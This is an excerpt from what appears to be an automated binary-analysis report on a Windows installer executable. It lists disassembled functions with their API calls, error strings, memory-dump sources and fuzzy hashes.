                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCompareString
                                                                                                                                                                  • String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                                                  • API String ID: 446873843-2531018330
                                                                                                                                                                  • Opcode ID: 1ec7b460b256ec9d298bdc3ddde619f5065c3d2614be173927e4f8f8fc60d8f8
                                                                                                                                                                  • Instruction ID: d4f4a3e06c84e1640cd8b5b910cec9867519bdfe3e5ff9cc13ae90873c99e977
                                                                                                                                                                  • Opcode Fuzzy Hash: 1ec7b460b256ec9d298bdc3ddde619f5065c3d2614be173927e4f8f8fc60d8f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 1821D136900118FBDF11AA94CC45BDEBA79EF04364F25427AF914A21A0D37D4EC6D698
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004366E5, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,00401105,?,?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?), ref: 004366FF
                                                                                                                                                                  • GetLastError.KERNEL32(?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001,00000003,000007D0,00401414,?,?), ref: 0043670D
                                                                                                                                                                  • CopyFileW.KERNEL32(00000000,00000000,?,00000000,00000000,?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001), ref: 00436773
                                                                                                                                                                  • GetLastError.KERNEL32(?,004367F0,00000000,00000000,?,00000000,?,004131F5,8BE275C0,?,00000001,00000003,000007D0,00401414,?,?), ref: 0043677D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CopyErrorFileLast
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 374144340-2967768451
                                                                                                                                                                  • Opcode ID: 9df04e82b78d48093cb99274816366c0fc78c965d54f789422b89107b6d9e6fd
                                                                                                                                                                  • Instruction ID: 0e1caff4f3e887c40eb8d9cdc5102c0655244d30e1f472330bf8ae0740582063
                                                                                                                                                                  • Opcode Fuzzy Hash: 9df04e82b78d48093cb99274816366c0fc78c965d54f789422b89107b6d9e6fd
                                                                                                                                                                  • Instruction Fuzzy Hash: 4621C93A500233BADB201A658C44B7B7698EF49BA9F53D13BFD04DB350D729CC0192E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041E700, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to check the dictionary of unique dependencies., xrefs: 0041E75A
                                                                                                                                                                  • Failed to add "%ls" to the list of dependencies to ignore., xrefs: 0041E7AD
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0041E722
                                                                                                                                                                  • Failed to add "%ls" to the string dictionary., xrefs: 0041E7A6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _wcstok_s
                                                                                                                                                                  • String ID: Failed to add "%ls" to the list of dependencies to ignore.$Failed to add "%ls" to the string dictionary.$Failed to check the dictionary of unique dependencies.$Failed to create the string dictionary.
                                                                                                                                                                  • API String ID: 86363921-3348696663
                                                                                                                                                                  • Opcode ID: c1423f8f5105f1491dd59fb413b56db6a7dfde575feb763465402424ea0f2341
                                                                                                                                                                  • Instruction ID: 314b2f9fb989107de7204395eb8c46e18fcfa734bb9181d1bbcb21c0d2847ee8
                                                                                                                                                                  • Opcode Fuzzy Hash: c1423f8f5105f1491dd59fb413b56db6a7dfde575feb763465402424ea0f2341
                                                                                                                                                                  • Instruction Fuzzy Hash: 29213876901328FBE71166529C42EEF7668DE44B58F20012FFC1076180E73D8E8052AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435B5E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00435B74
                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00435B90
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435C17
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435C22
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringVariant$AllocClearFreeInit
                                                                                                                                                                  • String ID: xmlutil.cpp
                                                                                                                                                                  • API String ID: 760788290-1270936966
                                                                                                                                                                  • Opcode ID: 92ef6095c0e39d7f7fd50edc8a75ede4b115f7e5ecce971dc864bb075a1b5e61
                                                                                                                                                                  • Instruction ID: 24237dbc482c238d1561a5b6cc10891e6c0ceb2cb357046a05b1f269461bc226
                                                                                                                                                                  • Opcode Fuzzy Hash: 92ef6095c0e39d7f7fd50edc8a75ede4b115f7e5ecce971dc864bb075a1b5e61
                                                                                                                                                                  • Instruction Fuzzy Hash: B3219F76900629ABCB109FA4CC48FAEBBB8EF88715F151169FD01AB210D738ED41CBD4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00437850, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00401F17,004021A7,00000000,00000000,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17), ref: 0043785E
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000,00000000), ref: 0043786C
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00401F17,004021A7,00401EAB,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000), ref: 004378D3
                                                                                                                                                                  • GetLastError.KERNEL32(?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000,?,?,0040878A,00401F17,00000000,00000000), ref: 004378DD
                                                                                                                                                                    • Part of subcall function 0043791E: GetFileAttributesW.KERNEL32(00401F17,00000000,?,00437885,00401F17,00000000,?,0041399D,00000000,00000000,00401F17,00000000,00401DDF,00000000), ref: 00437927
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryErrorLast$AttributesFile
                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                  • API String ID: 925696554-2193988115
                                                                                                                                                                  • Opcode ID: 340857b9a389d92ab918d3622745d580b28d208cfd871317a8ffb5a3ff77f5f5
                                                                                                                                                                  • Instruction ID: ecaf55f03831335b4c85d8b6e125739f4d686ded466bd7db4a3d5613d20c581a
                                                                                                                                                                  • Opcode Fuzzy Hash: 340857b9a389d92ab918d3622745d580b28d208cfd871317a8ffb5a3ff77f5f5
                                                                                                                                                                  • Instruction Fuzzy Hash: E2112BB6508231AAEB312AB25C08B3FB654EF0DBA0F11663BFD84D6250D71C8D11D2ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438141, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78encryptionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 00438156
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00412AAC,?,00000003,00000000,00000000), ref: 00438160
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CertCertificateContextErrorLastProperty
                                                                                                                                                                  • String ID: certutil.cpp
                                                                                                                                                                  • API String ID: 980632616-2692845373
                                                                                                                                                                  • Opcode ID: e20a156ecb163ea6884b13199cdf2270ad595b368475687ef00b34f142862615
                                                                                                                                                                  • Instruction ID: 8a24b848bd5c069524545c1d7ad7146acd7b839bc757868b25dbd68c70abf3bc
                                                                                                                                                                  • Opcode Fuzzy Hash: e20a156ecb163ea6884b13199cdf2270ad595b368475687ef00b34f142862615
                                                                                                                                                                  • Instruction Fuzzy Hash: B521F836600314BBDB219EA58C04BABBAE9DF49791F11015AFD05E7250DB758D0196F8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00438466, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,?,?,0041D9FB,00000000,?), ref: 0043847C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0041D9FB,00000000,?), ref: 0043848A
                                                                                                                                                                    • Part of subcall function 00431078: GetProcessHeap.KERNEL32(r@,?,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F), ref: 00431089
                                                                                                                                                                    • Part of subcall function 00431078: HeapAlloc.KERNEL32(00000000,?,00433C13,r@,00000001,00000104,00000000,?,00431C2E,?,00000104,?,00000000,00401C5F,?,004072ED), ref: 00431090
                                                                                                                                                                  • QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,0041D9FB,00000000,?), ref: 004384C4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0041D9FB,00000000,?), ref: 004384CE
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConfigErrorHeapLastQueryService$AllocProcess
                                                                                                                                                                  • String ID: svcutil.cpp
                                                                                                                                                                  • API String ID: 36289606-1746323212
                                                                                                                                                                  • Opcode ID: e732820817a610506819f5ce53d8fb466bffa7e0a62d974f13c5547876b59a79
                                                                                                                                                                  • Instruction ID: b779209ce3f7dcf329f74e4c2d89eadb626d5098a7c37e512c94fba903edceeb
                                                                                                                                                                  • Opcode Fuzzy Hash: e732820817a610506819f5ce53d8fb466bffa7e0a62d974f13c5547876b59a79
                                                                                                                                                                  • Instruction Fuzzy Hash: EA110D32600325BADB215A669D05BABB9E8DF497A0F11112BFD04EB250EB79CD0186E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004253F6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75networktimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004255EF: InternetCloseHandle.WININET(?), ref: 00425617
                                                                                                                                                                    • Part of subcall function 004255EF: InternetCloseHandle.WININET(00000000), ref: 00425627
                                                                                                                                                                    • Part of subcall function 004255EF: InternetConnectW.WININET(00000000,00000000,00000000,?,00000000,00000003,00000000,00000000), ref: 00425685
                                                                                                                                                                    • Part of subcall function 004255EF: lstrlenW.KERNEL32(?), ref: 004256AD
                                                                                                                                                                    • Part of subcall function 004255EF: InternetSetOptionW.WININET(00000000,0000002B,?,00000000), ref: 004256BE
                                                                                                                                                                    • Part of subcall function 004255EF: lstrlenW.KERNEL32(?), ref: 004256C5
                                                                                                                                                                    • Part of subcall function 004255EF: InternetSetOptionW.WININET(00000000,0000002C,?,00000000), ref: 004256D0
                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000078,?,75C08550,HEAD,00000000,00000000,00000000,?,00000000), ref: 0042548D
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004254A0
                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004254AB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$OptionTimelstrlen$ConnectFileSystem
                                                                                                                                                                  • String ID: Failed to connect to URL: %ls$HEAD
                                                                                                                                                                  • API String ID: 1677864904-290634988
                                                                                                                                                                  • Opcode ID: 989766e3a16855e281362701ee34f8ed6034a38d8ac9d61a2da286a4467fe270
                                                                                                                                                                  • Instruction ID: 102dc10fa19b1c8f4a8c9e6d1b9b3f019eb4eba5bdcb4fe59d34b1554eb5f9ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 989766e3a16855e281362701ee34f8ed6034a38d8ac9d61a2da286a4467fe270
                                                                                                                                                                  • Instruction Fuzzy Hash: 1E216271A00629BBCF02DF94DD419EFB7B9EF49304F11425AF901B2210E735DD509B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00437949, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000001,00000000,0000000D,?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009), ref: 00437984
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?), ref: 00437990
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000000,00000001,00000001,00000000,?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?), ref: 004379CB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E5B5,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?), ref: 004379D5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectoryErrorLast
                                                                                                                                                                  • String ID: dirutil.cpp
                                                                                                                                                                  • API String ID: 152501406-2193988115
                                                                                                                                                                  • Opcode ID: 7c36d294b4e1017ba34279a56e56fa2e29015d8b12e604cbd1d61372d5becd8a
                                                                                                                                                                  • Instruction ID: 4b4eb0356e1eea3a85c61789249e0c730f22cfb89ee5bc84b506fc5fda2137ad
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c36d294b4e1017ba34279a56e56fa2e29015d8b12e604cbd1d61372d5becd8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1811E0B2A043226BA7319A699C4476BF6DCEF0C791F11123BFE40E7200E738CD0086E8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004058A8, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 71COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                                                                                                                                  • API String ID: 2001391462-1605196437
                                                                                                                                                                  • Opcode ID: 187a18ce5530c79e8e21cbe05c76e8d2bde66e7b032d53ae56c5c003acff1954
                                                                                                                                                                  • Instruction ID: 3f15b953792c45890df0d7a0f8e594576b60357888415333c0d26816ccdf66a7
                                                                                                                                                                  • Opcode Fuzzy Hash: 187a18ce5530c79e8e21cbe05c76e8d2bde66e7b032d53ae56c5c003acff1954
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11E272640A20BAEB112A69AC42E9B3B54EB09734F105127FA04BD2C2C67DC810CAED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405E87, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405EA9
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format path string., xrefs: 00405EB4
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405F14
                                                                                                                                                                  • Failed to set variable., xrefs: 00405F00
                                                                                                                                                                  • Failed get file version., xrefs: 00405EE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                                                                                                                                  • API String ID: 3613110473-2458530209
                                                                                                                                                                  • Opcode ID: 108a430cabc468b8ef4446c80c77506b0b2b4dd609f42e8e4f9929932f19293e
                                                                                                                                                                  • Instruction ID: 2972c1c916137682356cd9a10621430bfb4207b355bf62a7394e358549d09ca4
                                                                                                                                                                  • Opcode Fuzzy Hash: 108a430cabc468b8ef4446c80c77506b0b2b4dd609f42e8e4f9929932f19293e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F119D76D00529BBCB12AE95888299FBB78EB08314F21517BF90176290E27D9E109F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004385DF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68timenetworkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,4000000B,00000000,?,00000000), ref: 0043861E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00438628
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 00438650
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043865A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastTime$FileHttpInfoQuerySystem
                                                                                                                                                                  • String ID: inetutil.cpp
                                                                                                                                                                  • API String ID: 3487154604-2900720265
                                                                                                                                                                  • Opcode ID: d5470935ef55b16c89d19136c23dc5e717ae583f529e44132163aeba140c28fc
                                                                                                                                                                  • Instruction ID: c51b22ae501f3caa2a8114c6535228ed663d9f41d2f87dddf0a1dd1f0cf17b58
                                                                                                                                                                  • Opcode Fuzzy Hash: d5470935ef55b16c89d19136c23dc5e717ae583f529e44132163aeba140c28fc
                                                                                                                                                                  • Instruction Fuzzy Hash: 4D115172A00229ABE710DBB99D49BABF6E8EF08740F51012AFE05E7150E6248D0086E9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EEC3, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000B8,00000000,00000000,00000000,00000000,00401414,00000000,00000000,00000000,?,0040F8A1), ref: 0040EF0F
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate message to write., xrefs: 0040EEEE
                                                                                                                                                                  • Failed to write message type to pipe., xrefs: 0040EF51
                                                                                                                                                                  • pipe.cpp, xrefs: 0040EF47
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                                  • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 3934441357-1996674626
                                                                                                                                                                  • Opcode ID: 158b2412e53a17054355f58b5a0970194ef28ab8687ae819dccb3abf3e138edb
                                                                                                                                                                  • Instruction ID: fce50a5e2f409bd0eece5f56f4797d1c18fa6157dcf94f0fc48e426ffdbcbc7a
